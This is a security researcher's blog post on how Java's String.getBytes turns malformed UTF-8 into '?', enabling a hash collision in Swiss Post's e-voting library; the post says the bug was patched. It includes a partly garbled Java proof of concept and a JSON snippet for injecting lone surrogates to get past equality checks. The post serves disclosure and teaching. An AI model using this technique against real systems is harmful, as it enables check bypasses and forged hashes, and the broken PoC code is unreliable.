Skip to main content

Beware of Java's String.getBytes

Sometimes there are subtle bugs whose origin can be found in some quirks from the underlying language used to build the software. This blog post describes one of those cases in order to let both fellow security researchers and developers, who didn't know about it, become aware of this potential vulnerable pattern. In fact, I'm pretty sure that similar bugs to the one herein described likely affect a bunch of products/codebases out there.

In previous posts, I've already described some bugs in the Swiss Post's future E-voting system. While reading their Crypto-Primitives specification, which among other things describes the custom Hashing algorithm Swiss Post implemented, I noticed something potentially interesting.

Basically, there are 4 different types that are supported: byte arrays, strings, integers and vectors. Before being hashed, strings are converted to a byte array via the 'StringToByteArray' algorithm.

However, by comparing 'StringToByteArray' and 'ByteArrayToString' we can find a significant  difference: invalid UTF-8 sequences are only considered in the latter. Let's see how this was implemented in the code:

File: crypto-primitives-master/src/main/java/ch/post/it/evoting/cryptoprimitives/internal/utils/
079:    /**
080:     * See {@link}
081:     */
082:    public static byte[] stringToByteArray(final String s) {
083:        checkNotNull(s);
085:        // Corresponds to UTF-8(S)
086:        return s.getBytes(StandardCharsets.UTF_8);
087:    }
089:    /**
090:     * See {@link}
091:     */
092:    public static String byteArrayToString(final byte[] b) {
093:        checkNotNull(b);
094:        checkArgument(b.length > 0, "The length of the byte array must be strictly positive.");
096:        CharsetDecoder decoder = StandardCharsets.UTF_8.newDecoder();
097:        // The try-catch clause implements the pseudo-code's if statement
098:        try {
099:            // Corresponds to UTF-8^-1(B)
100:            return decoder.decode(ByteBuffer.wrap(b)).toString();
101:        } catch (CharacterCodingException ex) {
102:            throw new IllegalArgumentException("The byte array does not correspond to a valid sequence of UTF-8 encoding.");
103:        }
104:    }

As expected, at line 100, 'byteArrayToString' tries to decode the input to detect invalid UTF-8 sequences. On the other hand, at line 86, 'StringToByteArray' directly uses 'getBytes'.

Internally, 'getBytes' will encode the string before returning the bytes. Let's see Java's implementation:

File: java/lang/
     * Encodes this {@code String} into a sequence of bytes using the given
     * {@linkplain java.nio.charset.Charset charset}, storing the result into a
     * new byte array.
     * <p> This method always replaces malformed-input and unmappable-character
     * sequences with this charset's default replacement byte array.  The
     * {@link java.nio.charset.CharsetEncoder} class should be used when more
     * control over the encoding process is required.
     * @param  charset
     *         The {@linkplain java.nio.charset.Charset} to be used to encode
     *         the {@code String}
     * @return  The resultant byte array
     * @since  1.6
    public byte[] getBytes(Charset charset) {
        if (charset == null) throw new NullPointerException();
        return encode(charset, coder(), value);

As the description of the method clearly states, any invalid character sequence will be replaced (onMalformedInput(CodingErrorAction.REPLACE).onUnmappableCharacter(CodingErrorAction.REPLACE) with the default "replacement byte array",  it doesn't trigger any exception.

In Java, the replacement byte array for a default Charset provider is one of the Unicode specials, the replacement character (0xFFFD). However, for some reason Java's UTF-8 Charset Encoder uses '?' (63d).

File: 'sun.nio.cs.UTF_8'

This behavior does not seem to comply with the Unicode's security recommendations.

It also differs from other languages, such as C#, which follows the best-practice and replaces (Encoding.UTF8.GetBytes) the malformed character sequence with the UTF-8 encoded version (0xEF 0xBF 0xBD) of the replacement character.  


This specific pattern may result in different attack scenarios, depending on the logic where the vulnerable pattern has been identified.

Swiss Post E-Voting 

In this specific case, what we end up with is a hash collision vulnerability.
This silly  PoC elaborates how two different strings are not injectively encoded, thus leading to a potential hash collision according to the 'RecursiveHash' algorithm.

import java.nio.charset.StandardCharsets;
import java.nio.ByteBuffer;
import java.nio.CharBuffer;
import java.util.Arrays;
import java.nio.charset.CharsetEncoder;
import java.nio.charset.CodingErrorAction;
import java.nio.ByteBuffer;
import java.nio.charset.CharacterCodingException;
import java.nio.CharBuffer;

public class poc {

    public static void encode(String string)
     throws CharacterCodingException {
     CharsetEncoder encoder = StandardCharsets.UTF_8.newEncoder();


     ByteBuffer encoded = encoder.encode(CharBuffer.wrap(string.toCharArray()));

     System.out.println("\nEncoding end");


    public  static void printhex(byte []ars) {

       for(int i=0;i<ars.length;i++){  


    public static byte[] stringToByteArray(final String s) {

        return s.getBytes(StandardCharsets.UTF_8);

    public static String  buildCustomString(String dat) {

        String badString ="\\+U"))
                .filter(s -> ! s.isEmpty()) 
                .map(s -> {
                    try {
                        return Integer.parseInt(s, 16);
                    } catch (NumberFormatException e) { 
                        System.out.println("Error parsing int");
                    return null; 
                .map(i -> Character.toString(i)) 

        return badString;

    public static String DumpInfo(String inf)
        String badString;

        System.out.println("=>> Original string (custom format): \"" + inf+"\""); 
        System.out.println("[+] Building String");
        badString = buildCustomString(inf);

        System.out.println("[+] String badString => \""+ badString+"\"");
        System.out.print("[+] badString.toCharArray() =>\t\t"); 
        char[] hash3 = badString.toCharArray();

        for(int i=0;i<hash3.length;i++){  


        System.out.print("[+] stringToByteArray(badString) =>     "); 

        return badString;

    public static void main(String args[]) {

        String badString1,badString2;

        String base = "Question_1?";

        // +UD8AF is illegal so it will be mapped to '?' after UTF8 encoding.
        String data1 = "+U0051+U0075+U0065+U0073+U0074+U0069+U006f+U006E+U005f+U0031+UD8AF";

        badString1 = DumpInfo(data1);

        System.out.println("[+] badString after UTF-8 encoding: \""+ badString1 + "\"");
        System.out.print("[+] stringToByteArray(base) =>   \t"); 

            System.out.println("[+] 'badString' and 'base' are not equal");

        try {
            //This will trigger an exception

        catch (Exception e) {




In the PoC there are two strings 'base' and 'badString'. The first one is a valid UTF-8 string that contains "Question_1?", while the latter contains "Question_1" plus a malformed UTF-8 sequence ('\uD8AF').

When 'stringToByteArray' is invoked on 'badString', its illegal sequence will be substituted by '?' resulting in the same hash that would be generated for the 'base' string. However, those strings, before being encoded, are different, as can be checked in the 'toCharArray()' and 'equals' comparisons. This is important to be able to potentially bypass certain checks, as 'equals' operates at the char array level

The output of the PoC is as follows

Swiss Post confirmed the bug ( #YWH-PGM232-122 ), which has been patched in version 1.3.0

Other products

The fact that Java's UTF-8 Encoder is replacing a malformed character sequence with a valid one, '?', which in turn plays an important role in URLs  makes me think that probably, in addition to the potential cryptographic issues we have already seen, this vulnerable pattern might be used to bypass certain security-related logic.

As long as the attacker can control the string, for instance after deserializing an attacker controlled JSON by using Jackson, there will be a chance to abuse the Java's UTF-8 'getBytes' replacement logic.

 ObjectMapper objectMapper = new ObjectMapper();
 String json = "{ \"badString\" : \"Question_1\\uD84F\" }";
 JsonNode jsonNode = objectMapper.readTree(json);
 String badString = objectMapper.readValue(jsonNode.get("badString").toString(), String.class);

If you happen to stumble upon a product with such a vulnerability, I would love to hear about it.

Popular posts from this blog

SATCOM terminals under attack in Europe: a plausible analysis.

------ Update 03/12/2022 Reuters has published new information on this incident, which initially matches the proposed scenario. You can find the  update  at the bottom of this post. ------ February 24th: at the same time Russia initiated a full-scale attack on Ukraine, tens of thousands of KA-SAT SATCOM terminals suddenly  stopped  working in several european countries: Germany, Ukraine, Greece, Hungary, Poland...Germany's Enercon moved forward and acknowledged that approximately 5800 of its wind turbines, presumably those remotely operated via a SATCOM link in central Europe, had lost contact with their  SCADA server .  In the affected countries, a significant part of the customers of Eutelsat's domestic broadband service were also unable to access Internet.  From the very beginning Eutelsat and its parent company Viasat, stated that the issue was being investigated as a cyberattack. Since then, details have been scarcely provided but few days ago I came across a really inter

VIASAT incident: from speculation to technical details.

  34 days after the incident, yesterday Viasat published a statement providing some technical details about the attack that affected tens of thousands of its SATCOM terminals. Also yesterday, I eventually had access to two Surfbeam2 modems: one was targeted during the attack and the other was in a working condition. Thank you so much to the person who disinterestedly donated the attacked modem. I've been closely covering this issue since the beginning, providing a  plausible theory based on the information that was available at that time, and my experience in this field. Actually, it seems that this theory was pretty close to what really happened. Fortunately, now we can move from just pure speculation into something more tangible, so I dumped the flash memory for both modems (Spansion S29GL256P90TFCR2 ) and the differences were pretty clear. In the following picture you can see 'attacked1.bin', which belongs to the targeted modem and 'fw_fixed.bin', coming from t

Reversing 'France Identité': the new French digital ID.

  -------------- Update from 06/10/2023 : following my publication, I’ve been in contact with France Identit√© CISO and they could provide more information on the measures they have taken in the light of these findings: We would like to thank you for your in-depth technical research work on “France Identite” app that was launched in beta a year ago and for which you were rewarded. As you know, the app is now generally available on iOS and Android through their respective app stores. Your work, alongside French cybersecurity agency (ANSSI) research, made us update and modify deeply the E2EE Secure Channel used between the app and our backend. It is now mostly based on TLS1.3. Those modifications were released only a few weeks after you submitted your work through our private BugBounty program with YesWeHack. That released version also fixes the three other vulnerabilities you submitted. From the beginning of “France Identite” program, it was decided to implicate cybersecurity community,